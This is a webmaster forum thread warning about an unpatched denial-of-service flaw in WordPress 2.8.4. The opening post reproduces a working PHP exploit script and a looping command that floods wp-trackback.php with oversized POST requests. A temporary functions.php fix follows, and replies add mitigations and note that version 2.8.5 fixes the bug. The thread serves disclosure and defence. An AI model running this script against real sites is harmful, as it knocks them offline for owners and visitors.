wordpress security: *must read* exploit not fixed in 2.8.4

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • fris
    Too lazy to set a custom title
    • Aug 2002
    • 55679

    #1

    wordpress security: *must read* exploit not fixed in 2.8.4

    Theirs currently an exploit out for 2.8.4 which isnt patched, that will allow someone to exhause your site using a DoS against certain file(s).

    Here is the POC (proof of concept)

    Code:
    <?php
    /*
     * wordpress Resource exhaustion Exploit
     * http://rooibo.wordpress.com/
     * [email protected] contacted and get a response,
     * but no solution available.
     * 
     * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <[email protected]>
     * 
     * exploiting:
     * you must install php-cli (command line interface)
     * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
     * 
     */
    if(count($argv) < 2)
        die("You need to specify a url to attack\n");
    $url = $argv[1];
    $data = parse_url($url);
    if(count($data) < 2)
        die("The url should have http:// in front of it, and should be complete.\n");
    $path = (count($data)==2)?"":$data['path'];
    $path = trim($path,'/').'/wp-trackback.php';
    if($path{0} != '/')
        $path = '/'.$path;
    $b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
    $charset = "";
    $charset = str_pad($charset,140000,"UTF-8,");
    $str = 'charset='.urlencode($charset);
    $str .= '&url=www.example.com';
    $str .= '&title='.$b;
    $str .= '&blog_name=lol';
    $str .= '&excerpt=lol';
    for($n = 0; $n <= 5; $n++){
        $fp = @fsockopen($data['host'],80);
            if(!$fp)
            die("unable to connect to: ".$data['host']."\n");
        $pid[$n] = pcntl_fork();
        if(!$pid[$n]){
            fputs($fp, "POST $path HTTP/1.1\r\n");
            fputs($fp, "Host: ".$data['host']."\r\n");
            fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
            fputs($fp, "Content-length: ".strlen($str)."\r\n");
            fputs($fp, "Connection: close\r\n\r\n");
            fputs($fp, $str."\r\n\r\n");
            echo "hit!\n";
        }
    }
    ?>
    and Here is the *temp* fix until they patch it

    add this to your themes functions.php file

    Code:
    <?php
    
    // WP Trackback Temp Fix
    
    function ft_stop_trackback_dos_attacks(){
            global $pagenow;
            if ( 'wp-trackback.php' == $pagenow ){
                    // DoS attack fix.
                    if ( isset($_POST['charset']) ){
                            $charset = $_POST['charset'];
                            if ( strlen($charset) > 50 ) {  die; }
                    }
            }
    }
    add_action('init','ft_stop_trackback_dos_attacks');
    
    ?>
    Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.
  • Lace
    Too lazy to set a custom title
    • Mar 2004
    • 16116

    #2
    Damn, just went and updated all of my sites recently too.

    Thanks, Fris.
    Your Paysite Partner
    Strength In Numbers!
    StickyDollars | RadicalCash | KennysPennies | HomegrownCash

    Comment

    • Cutty
      So Fucking Banned
      • Jan 2006
      • 1265

      #3
      Thanks mate, cheerio.

      Comment

      • Ginn
        Confirmed User
        • Apr 2009
        • 627

        #4
        Thanks for the info. I'll update everything now.

        DIAMONDGAYS.com - fresh twinks and best ratio! Highly recommended!

        Comment

        • greg80
          Confirmed User
          • May 2007
          • 1644

          #5
          what are you upgrading to? He said exploit still exists in 2.8.4 (current version)
          Say no to GoDaddy and high renewal prices! Go with NameSilo - FREE private whois for life, $8.99 regstrations and renewals. Free redirects, emails, great control panel and more! NameSilo rocks!

          Comment

          • greg80
            Confirmed User
            • May 2007
            • 1644

            #6
            Originally posted by greg80
            what are you upgrading to? He said exploit still exists in 2.8.4 (current version)
            edit: ok, I read it again. Thanks fris.
            Say no to GoDaddy and high renewal prices! Go with NameSilo - FREE private whois for life, $8.99 regstrations and renewals. Free redirects, emails, great control panel and more! NameSilo rocks!

            Comment

            • Cyber Fucker
              Hmm
              • Sep 2005
              • 12642

              #7
              Thx for the info!

              Comment

              • TheDA
                Confirmed User
                • May 2006
                • 4665

                #8
                Thanks. What's the fix for people running an old theme that doesn't have a functions.php? ;)

                Can the default functions.php just be copied over to the theme folder? What else needs to be done?
                Sharleen Spiteri - 1989 - In The Ass

                Comment

                • CYF
                  Coupon Guru
                  • Mar 2009
                  • 10973

                  #9
                  bumping up some good info, thanks fris
                  Webmaster Coupons Coupons and discounts for hosting, domains, SSL Certs, and more!
                  AmeriNOC Coupons | Certified Hosting Coupons | Hosting Coupons | Domain Name Coupons

                  Comment

                  • Stephen
                    Consigliere
                    • Feb 2003
                    • 1771

                    #10
                    Originally posted by CYF
                    bumping up some good info, thanks fris
                    ditto and thanks

                    Comment

                    • skinnay
                      Confirmed User
                      • Apr 2004
                      • 2274

                      #11
                      this is no where near the risk of the vulnerability that was recently patched by wordpress.
                      Make Real Green with ORGANIC SEO | Blog post exchange | Non-index page trades | A-B C-D Trades [icq: 194-215-962] [mail: [email protected]]

                      Comment

                      • fris
                        Too lazy to set a custom title
                        • Aug 2002
                        • 55679

                        #12
                        Originally posted by TheDA
                        Thanks. What's the fix for people running an old theme that doesn't have a functions.php? ;)

                        Can the default functions.php just be copied over to the theme folder? What else needs to be done?
                        its currently in the 2.8.4 core, it hasnt been updated yet.

                        You can add that code to your themes functions.php file which overrides any core functions that you have applied in functions.php
                        Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.

                        Comment

                        • Nicky
                          Too lazy to set a custom title
                          • Mar 2003
                          • 30071

                          #13
                          Thanks man, updating the most important one snow, will wait for new release for the smaller blogs.

                          gfynicky @ gmail.com

                          Comment

                          • TheSenator
                            Too lazy to set a custom title
                            • Feb 2003
                            • 13340

                            #14
                            Shit....this may help some people...Its a plugin

                            http://fullthrottledevelopment.com/w...ck-dos-attacks


                            I turned off my trackbacks years ago but I think it is still there to exploit.
                            ISeekGirls.com since 2005

                            Comment

                            • TheDA
                              Confirmed User
                              • May 2006
                              • 4665

                              #15
                              Originally posted by fris
                              its currently in the 2.8.4 core, it hasnt been updated yet.

                              You can add that code to your themes functions.php file which overrides any core functions that you have applied in functions.php
                              What I am saying is, I don't have a functions.php. So, can I just add a copy of the functions.php from the default Kubrick theme to the theme that doesn't have one and then apply this temporary fix to it?

                              I don't need to do anything else to call the functions.php or anything from any other files?
                              Sharleen Spiteri - 1989 - In The Ass

                              Comment

                              • Big E
                                Registered User
                                • Mar 2002
                                • 935

                                #16
                                If you have pingbacks/trackbacks turned off, can you just dev/null it via .htaccess?

                                <Files wp-trackback.php>
                                Order Deny,Allow
                                Deny from all
                                </Files>

                                Comment

                                • fris
                                  Too lazy to set a custom title
                                  • Aug 2002
                                  • 55679

                                  #17
                                  Originally posted by TheDA
                                  What I am saying is, I don't have a functions.php. So, can I just add a copy of the functions.php from the default Kubrick theme to the theme that doesn't have one and then apply this temporary fix to it?

                                  I don't need to do anything else to call the functions.php or anything from any other files?
                                  yes you can add it to file called functions.php if you dont have one currently
                                  Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.

                                  Comment

                                  • TheDA
                                    Confirmed User
                                    • May 2006
                                    • 4665

                                    #18
                                    Originally posted by fris
                                    yes you can add it to file called functions.php if you dont have one currently
                                    Okay, thanks.
                                    Sharleen Spiteri - 1989 - In The Ass

                                    Comment

                                    • digifan
                                      The Profiler
                                      • Oct 2002
                                      • 14618

                                      #19
                                      Awesome, thanks guys!
                                      [email protected]
                                      Webair Rocks

                                      Comment

                                      • fatfoo
                                        ICQ:649699063
                                        • Mar 2003
                                        • 27763

                                        #20
                                        Exploit not fixed? Thanks for posting. Interesting read.
                                        Send me an email: [email protected]

                                        Comment

                                        • d-null
                                          . . .
                                          • Apr 2007
                                          • 13724

                                          #21
                                          thanks for the info...


                                          fuck wordpress is a pain in the ass

                                          __________________

                                          Looking for a custom TUBE SCRIPT that supports massive traffic, load balancing, billing support, and h264 encoding? Hit up Konrad!
                                          Looking for designs for your websites or custom tubesite design? Hit up Zuzana Designs
                                          Check out the #1 WordPress SEO Plugin: CyberSEO Suite

                                          Comment

                                          • digitaldivas
                                            ..I Heart Cannibal Corpse
                                            • Sep 2007
                                            • 4328

                                            #22
                                            ...good looking out Fris
                                            ...

                                            Comment

                                            • Argos88
                                              So Fucking Banned
                                              • Sep 2009
                                              • 1732

                                              #23
                                              the exploit is FIXED..

                                              the problem you are referring to has to do with some permissions that a user can set. the problem you are referring to, can be more possible on mu if the admin doesn't know how to configure it.

                                              If you are really secure, you should post it in the wp trac and not in GFY. However, again, this was fixed long ago.

                                              Comment

                                              • 18teens
                                                Confirmed User
                                                • Dec 2002
                                                • 1605

                                                #24
                                                Thanks for the info.

                                                Comment

                                                • fris
                                                  Too lazy to set a custom title
                                                  • Aug 2002
                                                  • 55679

                                                  #25
                                                  Originally posted by Argos88
                                                  the exploit is FIXED..

                                                  the problem you are referring to has to do with some permissions that a user can set. the problem you are referring to, can be more possible on mu if the admin doesn't know how to configure it.

                                                  If you are really secure, you should post it in the wp trac and not in GFY. However, again, this was fixed long ago.
                                                  this actually hasnt been fixed, i asked one of the core wordpress developers in a chat this morning, their is a fix if you edit a certain file, but if you download 2.8.4 from the site, the issue is not fixed.
                                                  Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.

                                                  Comment

                                                  • fris
                                                    Too lazy to set a custom title
                                                    • Aug 2002
                                                    • 55679

                                                    #26
                                                    nevermind 2.8.5 has been released with the fix
                                                    Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.

                                                    Comment

                                                    • d-null
                                                      . . .
                                                      • Apr 2007
                                                      • 13724

                                                      #27
                                                      Originally posted by fris
                                                      nevermind 2.8.5 has been released with the fix
                                                      I'm going to wait for 2.8.6 .... at the rate they're going, that should be in another day or so

                                                      __________________

                                                      Looking for a custom TUBE SCRIPT that supports massive traffic, load balancing, billing support, and h264 encoding? Hit up Konrad!
                                                      Looking for designs for your websites or custom tubesite design? Hit up Zuzana Designs
                                                      Check out the #1 WordPress SEO Plugin: CyberSEO Suite

                                                      Comment

                                                      • TheSenator
                                                        Too lazy to set a custom title
                                                        • Feb 2003
                                                        • 13340

                                                        #28
                                                        Originally posted by d-null
                                                        I'm going to wait for 2.8.6 .... at the rate they're going, that should be in another day or so
                                                        Well, I rather keeping upgrading then lose a day worth work fixing exploits. I have too much money invested in my WordPress blogs.
                                                        ISeekGirls.com since 2005

                                                        Comment

                                                        • TheDA
                                                          Confirmed User
                                                          • May 2006
                                                          • 4665

                                                          #29
                                                          Originally posted by fris
                                                          nevermind 2.8.5 has been released with the fix
                                                          Let's see what this version brings
                                                          Sharleen Spiteri - 1989 - In The Ass

                                                          Comment

                                                          Working...